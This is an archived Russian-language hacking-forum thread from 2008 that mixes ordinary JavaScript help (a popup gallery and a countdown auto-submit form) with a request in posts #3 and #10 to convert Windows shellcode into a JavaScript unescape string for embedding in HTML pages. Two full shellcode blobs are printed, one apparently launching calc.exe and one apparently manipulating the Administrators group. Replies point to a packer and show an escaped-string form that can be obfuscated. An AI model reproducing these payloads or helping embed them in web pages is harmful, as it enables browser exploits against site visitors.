HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.12.2008, 21:10
d_x
Постоянный
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635

Репутация: 2407


По умолчанию

Можно вообще-то, но это подразумевает использование компонентов ActiveX, которые во многих браузерах запрещены или блокируются антивирусами.
 
Ответить с цитированием

  #2  
Старый 06.12.2008, 21:21
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

можно, кладем в одну папку fail.txt с любым содержимым, картинку zakat.jpg и такой вот index.html:

Код:
<html> 
<head> 
<title>Дополнительное окно с кнопкой ОТКРЫТЬ на странице и кнопкой ЗАКРЫТЬ в окне</title> 
<SCRIPT language="JavaScript">
function openwindow()
{
windop=window.open("fail.txt","mywindow","menubar=1,resizable=1,width=350,height=250");
windop.document.open(); 
windop.document.write("<html><head><title>Название странички</title>"); 
windop.document.write("</head><bоdу bgcolor=#FFFFCC>"); 
windop.document.write("<center><font face= serif,Arial,Verdana size=3 color=#000000><b>Заголовок текста на страничке</b></font></center>"); 
windop.document.write("<iframe src='fail.txt'></iframe>");
windop.document.write("<center><form><input type='button' value='Закрыть' onClick='window.close()'></form></center>"); 
windop.document.write("</bоdу></html>"); 
windop.document.close();
}
</SCRIPT></head> 
<bоdу> 
<FORM ACTION="javascript:openwindow()">
<INPUT      
     TYPE=IMAGE 
     SRC="zakat.jpg" 
     HEIGHT=38 WIDTH=62 
     ALT="Yes" BORDER=0 
     NAME="Yes"
     >
</form> 
</bоdу> 
</html>
и переходим в браузере на index.html

Появится картинка, нажав на которую мы увидим красивый комментарий к картинке взятый из файла fail.txt

Проверено на IE, OPERA и FIREFOX - везде работает

Таким вот незамысловатым образом можно замутить галлерею с описанием к каждой картинке
 
Ответить с цитированием

  #3  
Старый 08.12.2008, 01:28
barman
Новичок
Регистрация: 07.12.2008
Сообщений: 6
Провел на форуме:
25363

Репутация: 0
По умолчанию

как преобразовать
Код:
char code[] =   "\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3"   "\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68"   "\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68"   "\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89"   "\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53"   "\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31"   "\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00"   "\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69"   "\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89"   "\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51"   "\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49"   "\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00\xff\x56\x14"   "\xff\x56\x0c\x56\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"   "\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24\x18"   "\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01"   "\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38"   "\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1"   "\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"   "\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00"
в
Код:
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u735c%u7379%u6574%u336d%u5c32%u6163%u636c%u652e%u6578%u4100");
metasploit shellcodes parser/converter в меня не работает
 
Ответить с цитированием

  #4  
Старый 09.12.2008, 00:49
Mixon
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903

Репутация: 238
Отправить сообщение для Mixon с помощью ICQ
По умолчанию

Такой вот вопрос,мне нужно чтобы на клавише (button) шел таймер обратного отсчета,и только время избегало то автоматически нажималась данная клавиша,как ето можно сделать,и можноли вопше?
 
Ответить с цитированием

  #5  
Старый 09.12.2008, 01:02
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 
<html> 
<head> 
<title>Untitled</title> 
</head> 
<body> 
<form action="http://mysite.ru/myfile.php" method="post" name="reg" id="reg"> 
<div id="login">Логин:&nbsp;<input type="text" name="name"></div> 
<div id="pass">Пароль:&nbsp;<input type="password" name="pwd"></div> 
<div><textarea cols="50" rows="20" name="pravila"> 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
Тут текст правил, довольно длинный может быть. 
</textarea></div> 
<div id="butons"><input type="button" name="sbm" value="Подождите 15 секунд" onClick="alert('Вам дано 15 секунд для ознакомления с правилами!')" style="color: Gray;"><input type="Reset"></div> 
</form> 
 
<script type="text/javascript"> 
timeleft = 15; 
function decrim(){ 
timeleft -= 1; 
document.getElementById('butons').innerHTML = '<input type="button" name="sbm" value="Подождите '+timeleft+' секунд" onClick="endtime()" style="color: Gray;"><input type="Reset">'; 
if(timeleft == 0){ 
clearInterval(hs) 
document.getElementById('butons').innerHTML = '<input type="submit" name="sbm" value="ОК"><input type="Reset">'; 
document.reg.submit();
} 
} 
 
function endtime(){ 
alert('Вам осталось ждать '+timeleft+' секунд.\nЗаймите это время чтением правил!') 
} 
 
hs = setInterval("decrim()",1000) 
</script> 
</body> 
</html>
 
Ответить с цитированием

  #6  
Старый 09.12.2008, 01:33
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Mixon, setTimeout(function(){}, 9999);
 
Ответить с цитированием

  #7  
Старый 09.12.2008, 01:51
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

barman, x3k.ru
Слева снизу js packer
 
Ответить с цитированием

  #8  
Старый 09.12.2008, 13:21
barman
Новичок
Регистрация: 07.12.2008
Сообщений: 6
Провел на форуме:
25363

Репутация: 0
По умолчанию

Цитата:
Слева снизу js packer
ето где Слева снизу
 
Ответить с цитированием

  #9  
Старый 09.12.2008, 13:43
astrologer
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349

Репутация: 808


По умолчанию

Цитата:
Сообщение от barman  
ето где Слева снизу
Вот этот пакер: http://dean.edwards.name/packer/, только он не предназначен для конвертации шелл-кода.

В JS примерно так же будет:
Код:
var code = '\x66\x81\xec\x80.....';
А уже после можно делать, что угодно - обфусцировать, сжимать, и т.п.
 
Ответить с цитированием

  #10  
Старый 09.12.2008, 14:31
barman
Новичок
Регистрация: 07.12.2008
Сообщений: 6
Провел на форуме:
25363

Репутация: 0
По умолчанию

если так писать
Код:
var code = '\x66\x81\xec\x80.....';
то код не срабатывает,
сток много шелкодов на с а как их в html страницу зкинуть
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Delphi]/[Pascal] Задай вопрос, получи ответ Isis С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 6762 17.06.2010 21:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ